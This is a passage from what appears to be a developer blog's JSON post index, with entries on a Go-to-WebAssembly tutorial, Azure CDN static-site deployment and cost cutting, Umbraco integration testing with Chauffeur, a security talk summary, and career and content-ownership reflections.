"wasm", "javascript" ], "description": "Writing your first piece of Go to combine with WASM", "content": "Hello WASM, Go style You’ve got your Golang dev environment setup and now it’s time to put it to good use.\nWe’re going to start really basic and write what amounts to a Hello World code:\n1 2 3 4 5 6 7 package main import "fmt" func main() { fmt.Println("Hello WASM from Go!") } Well… that’s not particularly exciting, but let’s break it down to understand just what we’re doing here (after all, I’m expecting this might be your first time looking at Go).\n1 package main Here’s how we initialise our Go application, we define a main package which becomes our entry point. This is what the Go runtime will look for when it starts up so it knows where the beginning is. Think of it like class Program in C# for a console application.\nSide note: I just said “our Go application”, and that’s something that you need to think differently about with Go + WASM, we’re not just writing a bunch of random files that we talk to from the browser, we’re building an application that we compile specifically to run in the WASM virtual machine. This will make a bit more sense as we go along.\n1 import "fmt" This is how Go brings in external packages that we want to work with. In this case I’m pulling in the fmt package from Go’s standard library that gives us something to work with later on. It’s like open System in F#, using System in C#, or import foo from 'bar'; in JavaScript.\nLike F# & C# we only open a package, we don’t assign the exports of the package local variable if we don’t want to. If we wanted to import multiple packages we can either have multiple import statements or write something like this:\n1 2 3 4 import ( "fmt" "strconv" ) Side note: We’re not ready to get too complex with packages, but if you want to know more check out this article.\nFinally we create a function:\n1 2 3 func main() { fmt.Println("Hello WASM from Go!") } We’ve named our function main and given it no arguments, which is important, because this is the entry point function in our main package that the Go runtime looks for. Again, it’s like static void Main(string[] args) in a C# console application.\nNext we’re using the fmt package we imported and the public member of it Println to… print a string to standard out.\nRun Go, Run! It’s time to test our code, we’ll use the go run command for that:\n1 2 ~/tmp> go run main.go Hello WASM from Go! Yay we’ve created and run some Go code, but we’ve run it on a command line, not in a browser, and after all, we’re trying to make WASM, and for that we can’t use go run, we’ll need go build. But if we were to just straight up run go build it will output a binary file for the OS/architecture you are currently working with, which is OK if you’re building an application to run on a device, but not for creating WASM binaries. For that we need to override the OS and architecture that we’re compiling for.\nBuilding Go for WASM Conveniently Go allows you to specify environment variables to override system defaults, and for that we need to set GOOS=js and GOARCH=wasm to specify that the target OS is JavaScript and the architecture is WASM.\n1 ~/tmp> GOOS=js GOARCH=wasm go build -o main.wasm main.go And now we’ll have a file main.wasm that lives in the directory we output to.\nBut how do we use it?\nA Quick WebAssembly Primer For over 20 years we’ve had JavaScript in the browser as a way to run code on the web. WASM isn’t meant to be a replacement for JavaScript, in fact you’re really hard pressed to use it without writing (or at least executing) a little bit of JavaScript.\nThis is because WebAssembly introduces a whole new virtual machine into the browser, something that has a very different paradigm to JavaScript and is a lot more isolated from the browser, and importantly user space. WebAssembly executed pre-compiled code and is not dynamic like JavaScript in the way it can run.\nSide note: There are some really great docs on MDN that covers WebAssembly, how it works, how to compile C/C++/Rust to WASM, the WebAssembly Text Format and all that stuff. If you really want to understand WASM have a read through that, in particular the WebAssembly Text Format is very good at explaining how it works.\nSo before we can use our WASM binary we need to create a WASM module and instantiate the runtime space that WASM will run within.\nTo do this we need to get the binary and instantiate it with WASM. MDN covers this in detail but you can do it either synchronously or asynchronously. We’ll stick with async for our approach as it seems to be the recommended way going forward.\nAnd the code will look like this:\n1 2 3 4 5 6 async function bootWebAssembly() { let imports = {}; let result = await WebAssembly.instantiateStreaming(fetch('/path/to/file.wasm'), imports); result.instance.exports.doStuff(); } bootWebAssembly(); Don’t worry about the imports piece yet, we’ll cover that in our next chapter.\nWe’ve used fetch to download the raw bytes of our WASM file which is passed to WebAssembly and it will create your runtime space. This then gives us an object that has an instance (the runtime instance) that exports functions from our WebAssembly code (C/C++/Rust/etc).\nAt least, this is how works in an ideal world, it seems that Go’s approach is a little different.\nBooting our Go WASM output Now that we understand how to setup WebAssembly let’s get our Go application going.\nAs I mentioned Go is a little different to the example above and that’s because Go is more about running an application than creating some arbitrary code in another language that we can execute from JavaScript.\nInstead with Go we have a bit of a runtime wrapper that ships with Go 1.11+ called wasm_exec.js and you’ll find it in:\n1 ~/tmp> ls $"(go env GOROOT)/misc/wasm/wasm_exec.js" Copy this file into the folder with you main.wasm, we’re going to need it.\nNext we’ll create a webpage to run the JavaScript:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <html> <head> <meta charset="utf-8"> <script src="wasm_exec.js"></script> <script> async function init() { const go = new Go(); let result = await WebAssembly.instantiateStreaming(fetch("main.wasm"), go.importObject) go.run(result.instance); } init(); </script> </head> <body></body> </html> Finally we’ll host the code somewhere, you can use any webserver that you want, goexec, http-server, IIS, etc.\nNote: Make sure your server supports the WASM mime type of application/wasm.\nFire it up, launch the browser and open the dev tools, now you should see the result of fmt.Println there! Woo! Did you guess that we’d see it in the console? I bet you did, after all, that’s the thing most akin to standard out in the browser!\nGo’s WASM Runtime As you’ll see in the little HTML snippet above the was we start WASM for Go is a little different, first we create a Go runtime with new Go(), which is provided to us by wasm_exec.js.\nThis then provides us with an importObject to pass to the instantiateStreaming function and the result we get back we pass back to the runtimes run method.\nThis is because Go does a bit of funky stuff to treat the WASM binary as an application rather than arbitrary functions like others do. Over the rest of this series we’ll explore this a bit more too.\nConclusion There you have it folks, we’ve created our first bit of WASM code using Go, created some browser assets, executed it in the browser and seen an output message.\nWe’ve also learnt a little bit about how WASM works and how it’s isolated from the JavaScript environment, and what makes the approach with Go a little different to other WASM examples you’ll find on the web.\nBut our application is isolated, tune in next time and we’ll start looking at how to interact with JavaScript from WASM.\n", "id": "2019-02-05-golang-wasm-2-writing-go" }, { "title": "Learning Golang through WebAssembly - Part 1, Introduction and setup", "url": "https://www.aaron-powell.com/posts/2019-02-04-golang-wasm-1-introduction/", "date": "Mon, 04 Feb 2019 09:00:00 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "Introducing a new series on learning Go by writing WebAssembly", "content": "Introduction I’ve always liked tinkering with different technology and trying to stay abreast of things that look interesting. One thing that’s been on my radar for a while now is Go, aka Golang, but as someone who predominately does web development in the browser I was never quite sure where Go could fit into what I tend to build.\nAnother thing that I’d been meaning to pick up is Web Assembly, aka WASM, but again I’ve never quite had the time to pick it up. If you’re not familiar with WASM, it’s a new component of the web platform to allow developers to use high level languages like C, C++, Rust, Go, .NET, etc. in the browser in a native way, rather than converted to JavaScript. I’m by no means a WASM expert, but after a week of digging into things I’ve found some really interesting tidbits I’ll share along the way.\nAs I recently started a new Developer Relations job I decided that now was the perfect time for me to start exploring these technologies.\nAnd as it so happens Go’s 1.11 release last year includes experimental WASM support, so it looks like it’s meant to be.\nSo I have decided to put together a series that looks at the experience of using Go, learning WASM and how it all fits into the tool chain that we tend to use as web developers.\nWe won’t build anything particularly complex, the Go support is experimental at best, but it should give you enough of a starting point to work out where to go next.\nGetting Setup The first thing you’ll need to do is to setup a development environment. Go works on all major operating systems and I’ve used Windows + Windows Subsystem for Linux (WSL). My colleague Scott Coulton has written how to setup a WSL dev environment, including Go that I followed.\nOne thing I will note is that I haven’t managed to get code completion working in VSCode at the moment, something seems incorrect in the way I’ve setup my GOPATH and GOROOT, but so far it hasn’t been too painful for me to work without code completion. Once I got my GOPATH and GOROOT set properly and defined as environment variables in both Windows and Linux (WSL) it worked fine.\nGOPATH, GOROOT, huh? This is something that confused the heck out of me initially when I was getting setup, what these two things are and what do they do.\nBy default when installing on Windows Go will want to install into C:\\Go. I am not really a fan of this, there should be 3 things at the C:\\ level, Program Files (including the x86 folder), Users and Windows (now in reality you’ll have a few more things but they are all system-level things) so I wanted to change it. As a result of setting up Docker + WSL I already had a Go folder at C:\\Users\\<me>\\go and figured that’d be a good place to install Go into.\nAnd this is where things starting going wrong. Because of this I had both my GOPATH and GOROOT pointing to the same folder, which seemed logical to me, after all, that’s where Go was.\nNope, the Go commands kept throwing errors at me and this is because these two paths can’t be combined. The reason for this is that they represent two different concepts within Go:\nGOROOT - this is where Go is installed and where all of the Go system components are installed to. I use C:\\Users\\<me>\\goroot for that GOPATH - this is Go’s user space, where packages you pull down end up (such as goexec which we’ll use in the next article). I use C:\\Users\\<me>\\go for that So if you were to combine them you’d run the potential of trashing the “core” of Go.\nEditors and Browsers I use VS Code as my text editor and it has some great plugins for working with Go, but you can use whatever you would like.\nAs for browsers, well WASM is still pretty new so you’ll want an evergreen to make it work. I did have some problems with Edge so I tended to stick to Chrome and Firefox, but with Edge moving to Chromium shortly I see that problem going away. I have also been told that the demo we’ll build doesn’t seem to work on iOS Safari or Chrome Android, but I think that might be related to this issue, so stick to a desktop browser (also, you get dev tools there).\nWe will need Node.js eventually, but not first up, so go ahead and install it (I uses the latest v11 release) if you don’t already have Node.\nConclusion Ultimately this was pretty short post to set the stage for what we’re about to undertake.\nDon’t worry if you’ve never written a line of Go, or you’ve never heard of WebAssembly, we’ll take this journey together.\n", "id": "2019-02-04-golang-wasm-1-introduction" }, { "title": "Starting 2019 with a new job", "url": "https://www.aaron-powell.com/posts/2019-01-14-starting-2019-with-a-new-job/", "date": "Mon, 14 Jan 2019 09:45:47 +1100", "tags": [ "career", "readify", "microsoft" ], "description": "I've left Readify and completed my first week at Microsoft!", "content": "In my 2018 year in review I mentioned that I wrapped up 2018 by wrapping up at Readify and in January this year I started at Microsoft as a Cloud Developer Advocate.\nI’ve blogged about the journey I took at Readify as I moved through the consulting team and into the sales team. But after 8 years, 3 months and 2 days I left Readify for the last time (as an employee).\nWhy now? I’ve been asked this a few times by people since I started telling them I was leaving and naturally I point them to this YouTube clip to sum it up:\nJust kidding!\nIt actually comes down to two main reasons, a great opportunity and a lot of the same reasons I joined Readify initially.\nLeaving Readify This was a really tough decision, Readify had been my home for so long now, over double my next longest employer, so the idea of not being part of the Readify family was quite daunting.\nBut I knew that my time in the Pre-Sales role was coming to an end. I was on a 12 month secondment, so it was never a permanent thing, but that meant that I would have to work out what else I wanted to do.\nThis lead me to a cross-roads, I wanted to do one of two things, either take on a bigger challenge of technical strategy (leading the strategy for a business, department head, CTO, etc.) or go back to my roots and get technical.\nThrough the acquisition in Telstra the opportunity to tackle the former was very much there and I was looking at some options there, but at the same time I was talking to Microsoft about the CDA role. Over the course of a few months my wife and I had many discussions on this and I changed my mind maybe a hundred times on what I wanted to do next. In the end it came down to a single decision.\nNot letting an opportunity pass me by A few years ago I was approached by a friend in a product group at Microsoft to apply for a role. It was on a product I am passionate about so it would have been a very good fit. But it was bad timing, my wife and I had recently had a personal tragedy that made us shift some of our priorities and meant we weren’t in a position to relocate to the US, which the role required.\nAs the years have gone by, while I don’t regret the decision, I have often wondered “what if…”. And that was a key driver this time around, I didn’t want to look back in a few more years and think “what if…”.\nIn the end this played a large factor on my decision to move on from Readify. I really enjoyed my time at Readify, it’s a great place to work, I learned so much during my time there and would recommend it highly as a place to work for someone who’s wanting to work in consulting or wants to work with some amazing people. I’m sad I won’t get to watch the evolution of Readify from the inside, the next few years do look pretty exciting, but I don’t want to look at this opportunity in Microsoft and say “what if…”.\nSo what’s next? Wondering what I'm doing at Microsoft? I've joined the @azureadvocates Developer Relations team here in Australia.\nIf you run a community, startup or are a student looking for support, reach out 😁 https://t.co/ocDjA57JFC\n— Aaron Powell (@slace) January 7, 2019 I’m part of the Cloud Advocate team at Microsoft, I’ve joined as a Regional Cloud Developer Advocate, focusing on the Australian (and in particular Sydney) IT communities. What does mean in practice? Well I’m still figuring that out, I’m only 1 week in so it’ll take a bit of time 😝. But you’ll likely see a lot more of my online and around the communities here, so if you’re an event organiser I’d love to talk to you!\n", "id": "2019-01-14-starting-2019-with-a-new-job" }, { "title": "2018 - A year in review", "url": "https://www.aaron-powell.com/posts/2019-01-08-2018-a-year-in-review/", "date": "Tue, 08 Jan 2019 09:35:09 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "With another year done it time to get going on my year in review post. This year I’ve actually managed to get it done a full 3 days earlier than 2017’s!\n2018 was a pretty quiet year for me on the blogging front, with only 11 posts (including a ‘year in review’ one), and most of them were meta-posts about blogging or how I run websites. This reflects in my traffic stats, there was a drop in traffic over 2018 vs 2017. But this year was less about blogging and instead it was quite a big year for me both personally and professionally.\nGetting Personal I’ll start with the personal side of what made 2018 big, and that was that my wife and I welcomed our 2nd child in March. Unfortunately it wasn’t as smooth sailing as we had hoped, with him spending the first 8 days of his life in the neonatal intensive care unit (NICU) at our hospital. He was born just a touch earlier than planned and he had some trouble breathing which resulted in his stay in NICU.\nWhile he was only in there for a short period of time, relative to what most people there experience, it’s really tough to bring your wife home but not your newborn too. But we were lucky that he recovered quickly and now, 10 months on, you wouldn’t have any idea that he’d had any issues.\nUltimately being a dad of 2 had meant that I had a lot less free time to dedicate to all my other ventures and thus the blogging took a bit of a hit.\nBeing Professional Throughout 2018 I continued with my secondment to the Readify sales team. Being ‘off the tools’ did mean that I was having to invest a bit more time out of hours to stay up to date, or take more targeted PD when I wanted to learn something.\nI used this as a chance to really brush up on Azure, got myself a MCSA so apparently I know all about the Azure!\nSpeaking While I might have been keeping things a bit low-key on the blogging front I had a fairly hectic year speaking, over the course of 2018 I spoke at:\nuduf NDC Security NDC Oslo DDD Perth DDD Sydney (well, I MC’ed it 😛) DDD Melbourne NDC Sydney (workshop + talk) ALT.NET Sydney I’m pretty stoked at how many events I got to speak at this past year and I’m starting to prepare for the events I want to get to this year. Hopefully I can get a few more in 2019 😉.\nEnding an Era And this brings us to the big event of 2018, I left Readify to join Microsoft. I’ll do a separate post about that shortly but in summary it was a hard decision to make, Readify’s been my home for over 8 years, double my next longest stint anywhere, but my role at Microsoft was an opportunity I just couldn’t pass up.\nSo on to 2019, a new job at a new company and hopefully an exciting year to come!\n", "id": "2019-01-08-2018-a-year-in-review" }, { "title": "Automating Deployments for DDD Sydney", "url": "https://www.aaron-powell.com/posts/2018-07-05-automating-deployments-for-dddsydney/", "date": "Thu, 05 Jul 2018 10:43:52 +0200", "tags": [ "azure", "dddsydney" ], "description": "How we automate deployments of DDD Sydney's static websites", "content": "In my last post about Cutting Azure Costs for DDD Sydney I talked about how we now use static websites for the main DDD Sydney assets.\nToday I want to talk about how we deploy those, and importantly, how we work with Azure CDN for it. I’m not going to talk about how we do the build phase of the websites, because that’s going to be different depending on what you’re using to generate your static website (for example, we use next.js for the main website and hugo for the blog), instead I’ll focus on what you do with that pile of HTML, CSS, JavaScript and other web assets.\nDeploying to Blob Storage The first thing you’ll need to do is get your assets into Blob Storage, since that’s where they are served from. We’re using VSTS for this as it links to our O365 so it’s all federated auth (minimal accounts ftw!) and we just use the Azure File Copy task (v1) and well… that’s all really, job done, all go home!\nWell, not quite.\nDon’t forget to set the content type When you copy a file into Blob Storage it will automatically be assigned a generic mime type, and when served to the browser it’ll be served wrong and won’t render.\nThis is easily fixed by adding /SetContentType to the Additional Arguments property on the VSTS task (well, to azcopy under the hood).\nClean deployments or overriding deployments? We’re essentially using Blob Storage as a place to dump a bunch of files and then in Azure CDN we put a pretty URL in front of it. So when we do a deployment of changes, new posts to the blog, new/changed content of the website, etc. we needed to decide if we’re put them into the same folder as all other deployments or whether we’d dump them into a new container.\nI decided to go for the later, to do a clean deployment every single time into a new location each time, using the Blob Prefix property of the VSTS task being set to $(Release.ReleaseId).\nThis means that each release we do is kept separate from all previous releases and if something is broken we can always roll back a release!\nUpdating the CDN Great, your files are up in Blob Storage, they are in a new folder to the previous ones, so now it’s time make the CDN respect that. After all, the point of a CDN is that you rarely hit the underlying site, you serve it from cache.\nFor this I need to update the Origin Path of the CDN endpoint.\nThe what?\nWhen you’re using Azure CDN you create an Endpoint that provides the content to the CDN. Because we’re using Storage as our Origin type we can specify an Origin Path, which is the place within Storage that our files live. Now each release we change this path by appending a new release number, so we need to update that in Azure.\nFor this we use the Azure CLI VSTS task (v1) and run this command:\n1 az cdn endpoint update -n <name of your endpoint> --origin-path /<container name>/$(Release.ReleaseId) --profile-name <azure cdn name> -g <resource group name> The actual one we use for DDD Sydney’s blog is:\n1 az cdn endpoint update -n blog-dddsydney --origin-path /website/$(Release.ReleaseId) --profile-name dddsydney-blog-cdn -g blog Removing the old content The last piece of the puzzle is that we need to tell Azure CDN to refresh, just because we’ve changed the underlying origin doesn’t mean that we’re serving new content, it’s still cached after all!\nThis is done by running a purge on the CDN and again is done via the Azure CLI:\n1 az cdn endpoint purge --profile-name <azure cdn name> --name <endpoint name> -g blog --content-paths <path(s) to purge> Or for our blog:\n1 az cdn endpoint purge --profile-name dddsydney-blog-cdn --name blog-dddsydney -g blog --content-paths "/*" Now I’m a little lazy and just purging the whole CDN (setting the content-paths to "/*") rather than just the paths to updated content (eg: the home page), but it’s fine for the small site footprints that we run.\nPurging sometimes fails Something that I’ve learnt along the way is that the purge doesn’t always work. I’m not sure why this is, by my belief is that sometimes it times out in VSTS. This is manifested by the release passing but no new content appearing (blogs not published, website changes not appearing, etc.).\nSo far the only solution to this I’ve found is to log into the Azure portal and run the purge again, sometimes a few times 😛. It’s annoying, especially when I want to go to bed, but I’ve not had time to try and diagnose the problem in more details.\nConclusion And that’s how we deploy the we assets for DDD Sydney into Blob Storage, in a way that provides us with easy roll-back of changes, and update the CDN to reflect the new content.\nNow I’m away that Microsoft released support for static websites in Azure as a feature, but at the time of writing it doesn’t support using an Origin Path so we can’t quite switch over yet. Hopefully in the future, but we’ll wait and see.\n", "id": "2018-07-05-automating-deployments-for-dddsydney" }, { "title": "Cutting Azure Costs", "url": "https://www.aaron-powell.com/posts/2018-06-21-cutting-azure-costs/", "date": "Thu, 21 Jun 2018 16:53:50 +0200", "tags": [ "azure", "dddsydney" ], "description": "How I went about slashing Azure costs for DDD Sydney from $60 to $1.50 per month", "content": " Only a couple of weeks after I posted this article Azure announced that they have support for static websites in preview. Obviously this supersedes what I do here, but it doesn’t make it any less accurate 😉.\nAs you likely know, I’m one of the organisers of DDD Sydney, a not for profit conference in Sydney. Being a not for profit I’m always looking at how we can slash our costs because every dollar counts and this year I decided to look at how we can slash our Azure costs.\nWhy do we need to do this? Well over the last few years we’ve starts to get compound costs of running the web assets. I like the idea of having all the previous years websites still up and running because it gives people a view on what we’ve done over the years as an event and it’s also useful as a marketing tool when we speak to sponsors.\nFor the last two years the DDD Sydney website has used a fork of the DDD Melbourne website which was an ASP.NET MVC application. Because I like simplicity it was deployed as an Azure AppService running the standard tier so we get custom domains (it was then backed by Azure Table Storage for the session submission and voting). This works fine, it’s costs ~$15 AUD per month to run and because of annoyances with banks it was going on my personal credit card (and I was too lazy to expense it back to SydDev Inc, our business entity).\nBut we’re starting to get growth in our web presence, this year would see a third AppService running and I wanted to do a blog using Hugo like mine which would be forth AppService. Now we’d be running a bit of $60 per month and it’s to the point that I can’t just absorb that cost and it’s starting to get a bit more pricey for us as an event to run.\nIt was time to cut costs!\nGoing static Realistically the DDD Sydney web presence is a static experience, nothing really changes on the website for a long time, we have session submissions for a few weeks (which we used Sessionize for this year) and then voting. Nothing that really needs a dynamic webserver to be running. Because of this I wanted move to some kind of a static site for it, but I’m also time poor (read: lazy) so I wanted to do it with minimal effort.\nConveniently the DDD Perth team were building a new website using React and I jumped at the idea to use it. But they were going to run it in an AppService which seemed overkill so we just use Server Side Rendering and generate a bunch of HTML pages (and the React over the top so it has some dynamic stuff to it).\nWhere to host? Now I’ve got a bunch of static assets where can I host them? I’d like to not open a new account somewhere so using Azure made sense (it’s already setup, it’s integrated with our O365 for security, etc.). I know that I can push all these files up to Azure Blob Storage, turn on anonymous authentication and voila, you’ve got a static website… running at a pretty horrible URL.\nMaking the URLs pretty So you’ve got your site running in Azure Blob Storage but the URL isn’t great, it’s definitely not dddsydney.com.au, so now we need to do something to fix that up.\nMy first thought was Azure Function Proxies, they are an easy way to front a route with a nice URL and it supports SSL + custom domains, so, win!\nBut it turns out to not be quite as simple as that. I can’t for the life of me work out how to do some decent wildcard mapping in the proxy definition to get the pages all mapped. My only solution was to create a proxy for each page which is less than ideal, especially when the blog is thrown into the mix.\nMy next thought was Azure CDN. Now I have zero experience in Azure CDN and in fact I couldn’t find anyone I know who had experience with Azure CDN (that I work with, or know externally, I’m sure there are people who use it 😛), so there’s no time like the present to learn it now is there!\nAzure CDN as it turns out is really just a front for two other CDN providers, Verizon and Akamai, but integrated into the Azure portal… sort of. I was going to need to use the Premium tier because I need to create custom rules, which means I’m using Verizon under the covers.\nI came across this article that goes through the basics of what I needed.\nThere are some gotcha’s, or at least things to be aware of when using Azure CDN, first is the rules ordering with forced HTTPS. You need to make sure you do your forced HTTPS before the URL rewrite. This took me a while to get sorted and it is a few hours turn around each time you change a rule, so a good one to catch early.\nHere’s what our rules look like (for the blog):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <rules schema-version="2" rulesetversion="15" rulesetid="753098" xmlns="http://www.whitecdn.com/schemas/rules/2.0/rulesSchema.xsd"> <rule id="1210941" platform="http-large" status="active" version="5" custid="84F94"> <description>HTTP -> HTTPS</description> <!--If--> <match.request-scheme value="http"> <feature.url-redirect code="301" pattern="/8084F94/blog-dddsydney/website/\\d*/(.*)" value="https://%{host}/$1" /> </match.request-scheme> </rule> <rule id="1210878" platform="http-large" status="active" version="0" custid="84F94"> <description>Wildcards</description> <!--If--> <match.always> <feature.url-user-rewrite pattern="/8084F94/blog-dddsydney/((?:[^\\?]*/)?)($|\\?.*)" value="/8084F94/blog-dddsydney/$1index.html$2" /> <feature.url-user-rewrite pattern="/8084F94/blog-dddsydney/((?:[^\\?]*/)?[^\\?/.]+)($|\\?.*)" value="/8084F94/blog-dddsydney/$1/index.html$2" /> </match.always> </rule> </rules> The next thing to be aware of is that setting up SSL takes ages, seriously, it’s around 8 hours to get a certificate deployed across all CDN nodes, but the beauty is that it’s free and I don’t have to manage cert expiry or anything!\nAnd don’t forget that you will often have to purge the cache, and that can take a while, which will then result in some slowness initially.\nConclusion Over the last two months, since we’ve moved to running the 3 websites and blog as static websites in blob storage using Azure CDN in front it’s cost a total of $3.26. Yep, I’m pretty happy with that!\nNow sure, I could’ve done a static website in AWS using S3 buckets, or using CloudFlare as the CDN provider, or GitHub pages, or, or, or… but they all would’ve required a set of new accounts that we don’t want to manage. DDD Sydney is low cost because we keep things light weight, and the more overhead I add through different platforms we have to push to, the more painful, and thus expensive, it become. So in the end getting it all setup in Azure is good for us, and really, it wasn’t that complex once I knew what I was doing.\n", "id": "2018-06-21-cutting-azure-costs" }, { "title": "Securing SPA's at NDC Security", "url": "https://www.aaron-powell.com/posts/2018-05-16-securing-spas-ndc-security/", "date": "Tue, 22 May 2018 15:25:18 +1000", "tags": [ "javascript", "speaking", "security", "pluralsight" ], "description": "Some info about my NDC Security talk on Securing Single Page Apps", "content": "Last week I had the pleasure of speaking at the first NDC Security Australia on the topic of Securing Single Page Applications.\nThis talk was an extension of a recent Pluralsight Play by Play that Troy Hunt collaborated on under the same topic.\nThe slides from the talk are available here.\nIn the talk I refer to this blog post about harvesting credit card details using npm packages and that you can use tools like Sonar, Retire.js and Snyk.io to track issues in your external dependencies.\nI also talked about creating keyloggers in CSS, using this PoC, but I might write a bigger piece about that in the future.\nI think this is a great talk, and a topic that is too often overlooked, so if you’d be interested in learning more get in touch and we’ll see if I can’t work out a time to present it again 😀.\n", "id": "2018-05-16-securing-spas-ndc-security" }, { "title": "Integration Testing Umbraco With Chauffeur", "url": "https://www.aaron-powell.com/posts/2018-03-22-integration-testing-umbraco-with-chauffeur/", "date": "Thu, 22 Mar 2018 10:51:52 +1100", "tags": [ "umbraco", "chauffeur" ], "description": "How to use Chauffeur to make it easier to create integration tests against the Umbraco API", "content": "One of the design goals of Chauffeur was to make it easy to extend, and that was the reason why I separated the core of Chauffeur out of the console application that you use to interact with it, resulting in the two NuGet packages. This means that really all the power of Chauffeur actually resides within the Chauffeur package and the runner really just creates an instance of the core class in there, UmbracoHost.\nSome time ago when I was trying to work out how to avoid some nasty regressions I hit across Umbraco versions I decided to create a suite of Integration Tests to go along with the Unit Tests that I already had in there, but in doing so I’d need to “start Umbraco”, but I didn’t want to be running IIS Express because it would just be really hard to interact with.\nI decided to see just how far I could push Chauffeur to help with this, I mean, I was already pretty familiar with how Umbraco works internally and that I was essentially starting Umbraco in the console application, so it got me thinking, could I start Umbraco in a test runner?\nLong story short, yes, yes I can run Umbraco in a test runner! I won’t go into the details of that here, it’s kind of convoluted what you need to do, but you can see on my CI server that it just works.\nLast month when I was up at uduf I was talking with people about testing Umbraco and how I was doing it with Chauffeur. One of the people I chatted to was Nathan Woulfe, author of Plumber, an Umbraco workflow tool. Together we’ve started working on Chauffeur integration for Plumber, but last week I saw him tweet this:\nAny #umbraco integration testing masters feel like helping out and sharing your ninja ways? https://t.co/8wwpLEHLDD\n— Nathan Woulfe (@nathanwoulfe) March 16, 2018 Well I saw a challenge, I know I can use Chauffeur to test Chauffeur, but could I use Chauffeur to test someone elses library?\nA night on the couch and a beer later I replied with this:\nHacked it a bit nastily tonight and got this going. It's all orchestrated by Chauffeur. pic.twitter.com/FUMANlb5X8\n— Aaron Powell (@slace) March 16, 2018 🎉\nAdmittedly it was pretty hacky to do so my next goal was to make it easier.\nIntroducing Chauffeur.TestingTools Today I published a preview build of a new NuGet package, Chauffeur.TestingTools, which will be part of the Chauffeur v1.1 release that I’m working on at the moment.\nThis NuGet package extracts the logic that I had in my Integration Tests into something that’s more generic (I even ported my Integration Tests to using it!).\nCreating Umbraco integration tests with Chauffeur.TestingTools So what do you get with this package? Right now you get an abstract class called UmbracoHostTestBase which you inherit from to:\nSet up a location for the SQL CE database that is unique to that test run Starts Chauffeur with fake input and output streams that you can interact with Let’s look at a basic test:\n1 2 3 4 5 6 7 8 9 10 public class HelpTests : UmbracoHostTestBase { [Fact] public async Task Help_Will_Be_Successful() { var result = await Host.Run(new[] { "help" }); Assert.Equal(DeliverableResponse.Continue, result); } } That. Is. All.\nThe UmbracoHostTestBase uses its constructor to setup everything because that’s how xunit works. Now I don’t dictate that you use xunit, if you use anything else I’d love to know how you go and if it doesn’t work so we can work together to make it compatible.\nThe class then exposes the Chauffeur “Host” as a Host property that you can execute Chauffeur commands against.\nWorking with IO Let’s say you want to read the output of your deliverable? Easy, there’s a TextWriter property that uses the MockTextWriter class I ship and it exposes all the messages written by WriteLineAsync as a collection.\nWhat if you want to simulate user input (reading from the console)? Well that’s covered too, the TextReader property exposes an instance of MockTextReader that you can call the AddCommand function to add user input to a stack. Be aware that it’s read in FIFO mode, so you’ll need to order your “reads” correctly.\nGotcha’s when doing Umbraco integration tests So there’s a few things that you need to do that are manual steps (or at least, manual at the moment):\nYou’ll need the Umbraco config files.\nThat stuff that lives in /config? Yeah you’ll need to copy those into your Integration Test project and then set them to be copied to the build output (Properties -> Copy to Output Directory), since Umbraco’s internal API’s will try and read those files.\nThis also means you kind of need a web.config, kind of. You don’t need the full Umbraco web.config, just the configSections definition for umbracoConfiguration, the umbracoConfiguration (pointing to the right config files), a connection string (SQL CE does work!), the DbProviderFactories and membership.\nCheck out my app.config in the integration tests of Chauffeur for an example of how it all works.\nUsing SQL CE SQL CE works nicely for integration tests, it’s how I do Chauffeur’s integration tests, and one of the things the base class does is setup a unique directory for the Umbraco.sdf file, so you don’t have clashes across multiple tests. But there is a manual step, you need to copy the amd64 and x86 directories from the UmbracoCms NuGet package (they are in the UmbracoFiles/bin folder) into your bin/Debug (or whatever the output folder of your tests is). If you don’t do this you’ll get a really obscure error message, and I can’t work out a simpler way to do it than manual copy/paste.\nWorking with the Umbraco Services It’s all good that you can run Chauffeur deliverables but what if you’re doing something with just plain Umbraco services, maybe reading DocTypes, creating content, etc.?\nAgain, I got you covered! Since the base class basically starts Umbraco you have access to all Umbraco services off their singletons. Here’s a really basic test that ensures you get all the standard data type definitions on install:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 public class NonChauffeurTests : UmbracoHostTestBase { [Fact] public async Task All_Data_Types_Installed() { // respond with "yes" to install SQL CE TextReader.AddCommand("y"); var result = await Host.Run(new[] { "install" }); var dataTypeDefinitions = ApplicationContext.Current.Services.DataTypeService.GetAllDataTypeDefinitions(); Assert.Equal(24, dataTypeDefinitions.Count()); } } Conclusion This is my first cut of trying to make it easier to integration test Umbraco and I’d really like to hear from anyone who has a crack at using this stuff!\n", "id": "2018-03-22-integration-testing-umbraco-with-chauffeur" }, { "title": "Content Ownership and Aggregation Sites", "url": "https://www.aaron-powell.com/posts/2018-03-04-content-ownership-and-aggregation-sites/", "date": "Sun, 04 Mar 2018 16:39:48 +1100", "tags": [ "random" ], "description": "Some more thoughts around content ownership.", "content": "Earlier this year I wrote about my thoughts on blogging and content ownership and I wanted to expand on it with the perspective on a type of publishing that’s becoming popular, aggregation sites.\nSites like hackernoon are gaining in popularity and for good reason, they are a great way to get content to a wider audience than just through your own blog (generally speaking). But there’s also a risk factor that I think people don’t realise with this and it’s something that I have been caught with, and that’s the lifetime of these sites.\nA number of years ago I pushed some content through an aggregation site that was affiliated with the company I worked for at the time. I found it very useful to help grow my own online profile as the company had a greater reach that I did.\nBut life carried on and I left that company, stopped publishing through the aggregation site and basically forgot about it.\nThat is, until last year when I was trying to recover my old posts. One piece of my digging landed me back on the aggregation site and I noticed something weird, the site was very different to when I was involved, very different indeed. Now over the years since I left that company they changed some of their focus, the devs came and went and all the people I worked with had moved on. As a result the site was no longer important to them and the domain had lapsed.\nSo what seemed to have happened was someone had purchased the lapsed domain and decided to create their company blog on it, but also restoring all the old content.\nAnd now we come to the issue that I have, to the causal reader it would appear that I had been contributing content to this company, a company I’d never been affiliated with. This is something I’m not cool with. Ultimately it was something I rectified with the new site owner pretty quickly, but that may not always be the case.\nConclusion And this is where we end our cautionary tail. I’m not here to say don’t use aggregation sites, they care very valuable for getting your reach out beyond what you might normally be able to achieve, but go into it with open eyes. What is the license of the content that you’re handing over? Have you thought about what would happen if the domain lapsed and someone else took it for their purposes?\nAt the end of the day this is your IP, be sure to own in.\n", "id": "2018-03-04-content-ownership-and-aggregation-sites" }, { "title": "Managing Packages With Chauffeur", "url": 